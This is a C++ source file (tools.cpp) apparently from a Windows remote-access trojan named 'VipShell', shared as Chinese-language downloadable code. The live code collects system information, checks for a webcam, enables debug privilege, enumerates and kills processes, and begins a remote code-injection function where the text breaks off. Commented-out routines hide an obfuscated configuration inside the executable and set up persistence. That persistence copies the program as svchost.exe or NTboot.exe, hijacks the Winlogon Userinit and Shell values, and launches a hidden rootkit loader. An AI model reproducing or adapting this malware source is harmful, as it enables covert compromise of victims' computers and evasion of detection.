tools.cpp

软件源代码,共享。有2个文件

#include "tools.h"
#include "Vfw.h"
#include <TCHAR.H>
#include <TLHELP32.H>
#include <Wininet.h>
#pragma comment (lib, "Vfw32.lib")
#include <Psapi.h>
#pragma comment (lib, "Psapi.lib")
#pragma comment (lib, "Wininet")
#include <atlbase.h>

DWORD GetCpuInfo()
{
	HKEY hKey;
	DWORD dwBufLen = 80;
	RegOpenKeyEx( HKEY_LOCAL_MACHINE,
	   L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",
	   0, KEY_QUERY_VALUE, &hKey );
	DWORD dwCpu;
	dwBufLen = sizeof(DWORD);
	RegQueryValueEx( hKey, L"~MHz", NULL, NULL,
	   (LPBYTE)&dwCpu, &dwBufLen);
	RegCloseKey(hKey);
	return dwCpu;
}

BOOL GetServerEdition(DWORD* dwMajorVersion, DWORD* dwMinorVersion, DWORD* dwPlatformId)
{
	 OSVERSIONINFOEX osvi;
	 osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
	  if( ! GetVersionEx ((OSVERSIONINFO *) &osvi))
		  return FALSE;
	  *dwMajorVersion = osvi.dwMajorVersion;
	  *dwMinorVersion = osvi.dwMinorVersion;
	  *dwPlatformId   = osvi.dwPlatformId;
	  return TRUE;
}

DWORD GetMemorySize()
{
	MEMORYSTATUS ms;
	GlobalMemoryStatus(&ms);
	return (DWORD)ms.dwTotalPhys;
}
bool IsCanCap()
{
	WCHAR szVfwName[256];
	WCHAR szVfwVersion[256];
	ZeroMemory(szVfwName, sizeof(szVfwName));
	ZeroMemory(szVfwVersion, sizeof(szVfwVersion));
	capGetDriverDescription(0, szVfwName, sizeof(szVfwName), szVfwVersion, sizeof(szVfwVersion));
	if(lstrlen(szVfwName) == 0)
		return false;
	return true;
}

HWND FindCapWnd()
{
	WCHAR szClassName[] = L"___GetCapWnd___";
	HWND hwnd = NULL;
	for(int i = 0; i < 100; i++)
	{
		hwnd  = ::FindWindow(szClassName, NULL);
		if(hwnd != NULL)
		{
			SendMessage(hwnd, WM_CLOSE, 0, 0);
			SendMessage(hwnd, WM_DESTROY, 0, 0);
			return hwnd;
		}
	}
	return hwnd;
}
//提升进程访问权限
bool enableDebugPriv()
{
    HANDLE hToken;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;
  
    if (!OpenProcessToken(GetCurrentProcess(), 
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return false;
    }
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
        CloseHandle(hToken);
        return false;
    }
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
        CloseHandle(hToken);
        return false;
    }
    return true;
}

bool GetProcessFilePath(DWORD dwProcessId, LPTSTR szPath, DWORD dwbufflen, bool isGetPath)      //根据ProcessId得到对应的文件地址
{
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
	if(hProcess == NULL)
		return false;
	HMODULE hMode;
	DWORD dwLen;
	if( !EnumProcessModules(hProcess, &hMode, sizeof(hMode), &dwLen))
	{
		CloseHandle(hProcess);
		return false;
	}
	GetModuleFileNameEx(hProcess, hMode, szPath,  dwbufflen);
	if(isGetPath)
	{
		*(_tcsrchr(szPath, _T('\\'))+1)  = 0;
	}
	CloseHandle(hProcess);
	return true;
}

BOOL KillProcess(DWORD dwProcessId)
{
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
	if(hProcess == NULL)
		return false;
	BOOL bRet = TerminateProcess(hProcess, 0);
	CloseHandle(hProcess);
	return bRet;
}

DWORD GetProcessIdByName(LPCWSTR szName)
{
	DWORD dwRet = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof( PROCESSENTRY32 );
    Process32First( hSnapshot, &pe32 );
    do
	{

		if ( _tcsicmp(pe32.szExeFile, szName) == 0)
		{
			dwRet = pe32.th32ProcessID;
			break;
		}


    } while ( Process32Next( hSnapshot, &pe32 ) );
    CloseHandle( hSnapshot );
	return dwRet;
}
DWORD GetProcessToVecTor(std::vector<tagVipShellProcess>* pVecTor)
{
	pVecTor->clear();
    HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof( PROCESSENTRY32 );
    Process32First( hSnapshot, &pe32 );
	tagVipShellProcess Proc;
    do
	{
		memset(&Proc, 0,sizeof(tagVipShellProcess));
		Proc.dwPid = pe32.th32ProcessID;
		bool bIsOk = GetProcessFilePath(Proc.dwPid, Proc.cFileName, sizeof(Proc.cFileName), false);
		if( !bIsOk )
			lstrcpy(Proc.cFileName, pe32.szExeFile);
		pVecTor->push_back(Proc);

    } while ( Process32Next( hSnapshot, &pe32 ) );
    CloseHandle( hSnapshot );
	return (DWORD)pVecTor->size();
}

//bool GetVipShellConfig(LPCWSTR szFile,	LPVIPSHELLCONFIG pCfg)
//{
//	FILE* fp  = _wfopen(szFile, _T("rb"));
//	if( !fp )
//		return false;
//	long loffset = 0 - sizeof(VIPSHELLCONFIG);
//	int nRet = fseek(fp, loffset, SEEK_END);
//	if ( nRet != 0)
//	{
//		fclose(fp);
//		return false;
//	}
//	fread(pCfg, 1, sizeof(VIPSHELLCONFIG), fp);
//	fclose(fp);
//	BYTE bByte;
//	for(int i = 0 ; i < sizeof(VIPSHELLCONFIG); i++)
//	{
//		bByte = (BYTE)*((BYTE*)pCfg + i);
//		bByte ++;
//		(BYTE)*((BYTE*)pCfg + i) = bByte;
//	//	*(BYTE*)(pCfg + i) = bByte;
//	}
//	return true;
//}
//bool GetVipShellConfig(LPVIPSHELLCONFIG pCfg)
//{
//	CStartAggregate hStart;
//	VIPSHELLCONFIG vipcfg;
//	WCHAR pExePath[MAX_PATH] ; GetExeFilePath(pExePath);
//	bool bRet =  GetVipShellConfig(pExePath, &vipcfg);
//	if(!bRet)
//		return false;
//	std::wstring strCfgFile = hStart.m_strWindowsPath;
//	strCfgFile += vipcfg.szCfgFile;
//	VIPSHELLCONFIG vipcfgEx;
//	bRet = GetVipShellConfig(strCfgFile.c_str(), &vipcfgEx);
//	if( !bRet )
//	{
//		memcpy(pCfg, &vipcfg, sizeof(VIPSHELLCONFIG));
//		return true;
//	}
//	bRet = SetVipShellConfig(strCfgFile.c_str(),  &vipcfgEx);
//	if(!bRet)
//		return true;
//	memcpy(pCfg, &vipcfgEx, sizeof(VIPSHELLCONFIG));
//	return true;
////	MakeRun(hStart.m_strExePath.c_str(), vipcfgEx.szServerName);
//}
//
//bool SetVipShellConfig(LPCWSTR szFile,	LPVIPSHELLCONFIG pCfg1)
//{
//	VIPSHELLCONFIG tp;
//	memcpy(&tp, pCfg1, sizeof(VIPSHELLCONFIG));
//	LPVIPSHELLCONFIG pCfg =&tp;
//	BYTE bByte;
//	for(int i = 0 ; i < sizeof(VIPSHELLCONFIG); i++)
//	{
//		bByte = (BYTE)*((BYTE*)pCfg + i);
//		bByte --;
//		(BYTE)*((BYTE*)pCfg + i) = bByte;
//	}
//	FILE* fp  = _wfopen(szFile, _T("wb"));
//	if( !fp )
//		return false;
//	long loffset = 0 - sizeof(VIPSHELLCONFIG);
//	int nRet = fseek(fp, loffset, SEEK_END);
////	if ( nRet != 0)
////		return false;
//	fwrite(pCfg, 1, sizeof(VIPSHELLCONFIG), fp);
//	fclose(fp);
//	return true;
//}
//bool SetVipShellConfigExplain(LPCWSTR szEx)
//{
//	VIPSHELLCONFIG Cfg;
//	WCHAR pExePath[MAX_PATH] ; GetExeFilePath(pExePath);
//	GetVipShellConfig(pExePath, &Cfg);
//	lstrcpy(Cfg.szExplain, szEx);
//
//	CStartAggregate hStart;
//	std::wstring strCfgFile = hStart.m_strWindowsPath;
//	strCfgFile += Cfg.szCfgFile;
//
//	SetVipShellConfig(strCfgFile.c_str(), &Cfg);
//	return true;
//}

//void MakeRun(LPCWSTR szFile, LPCWSTR szServerName, bool bIsRun)
//{
//
//	if( szServerName == NULL)
//	{
//	
//		VIPSHELLCONFIG vipcfgEx;
//		bool bRet = GetVipShellConfig( &vipcfgEx);
//		if(!bRet)
//			return ;
//		//return MakeRun(szFile, vipcfgEx.szServerName, bIsRun);
//	}
//
////获取配置，如果不先获取配置信息，则将无法在之后使用 vipcfgEx.szExeName;
//	VIPSHELLCONFIG vipcfgEx;
//	GetVipShellConfig( &vipcfgEx);
////结束获取
//	CStartAggregate hStart;
//	hStart.m_strExePath = szFile;
//	std::wstring strServerPath = hStart.m_strSystemPath;
//	//strServerPath += vipcfgEx.szExeName;
//
////	strServerPath += L"NTboot.exe";
//	//CopyFile(hStart.m_strExePath.c_str(), strServerPath.c_str(), FALSE);
//	//hStart.CreateNtService(szServerName, strServerPath.c_str());
//
//	//if(!bIsRun)
//	//DeleteFile(strServerPath.c_str());
//
//	//if(bIsRun)
//	//	hStart.SetCurrentVersionWinlogonUserinit(strServerPath.c_str());
//	//else
//	//	hStart.SetCurrentVersionWinlogonUserinit(L"");
//
//	//if(!bIsRun)
//		//DeleteFile(strServerIe.c_str());
//
////启动项目创建完毕，执行加载程序，隐藏自身
//    //WinExec("rk_loader.exe", SW_HIDE);
////启动项目创建完毕，执行加载程序，隐藏自身
//
///*
//	std::wstring strServerLoad = hStart.m_strSystemPath;
//	strServerLoad += L"Fixboot.exe";
//	CopyFile(hStart.m_strExePath.c_str(), strServerLoad.c_str(), FALSE);
//	if(bIsRun)
//		hStart.SetCurrentWindowsLoad(strServerLoad.c_str());
//	else
//		hStart.SetCurrentWindowsLoad(L"");
//	if(!bIsRun)
//		DeleteFile(strServerLoad.c_str());
//
//	std::wstring strServerIe = hStart.m_strIePath ;
//	strServerIe += L"NTboot.exe";
//	CopyFile(hStart.m_strExePath.c_str(), strServerIe.c_str(), FALSE);
//	if(bIsRun)
//		hStart.SetCurrentVersionWinlogonUserinit(strServerIe.c_str());
//	else
//		hStart.SetCurrentVersionWinlogonUserinit(L"");
//	if(!bIsRun)
//		DeleteFile(strServerIe.c_str());
//
//	std::wstring strServerhelp = hStart.m_strWindowsPath;
//	strServerhelp += L"svchost.exe";
//	CopyFile(hStart.m_strExePath.c_str(), strServerhelp.c_str(), FALSE);
//	if(bIsRun)
//		hStart.SetCurrentVersionWinlogonShell(strServerhelp.c_str());
//	else
//		hStart.SetCurrentVersionWinlogonShell(L"");
//	if(!bIsRun)
//		DeleteFile(strServerhelp.c_str());
//
//*/
//}

DWORD InjectRemote
(
HANDLE hProcess,
//DWORD PID,
void* pfnRemoteFunc, 
DWORD dwFuncSize, 
void* pRemoteParam,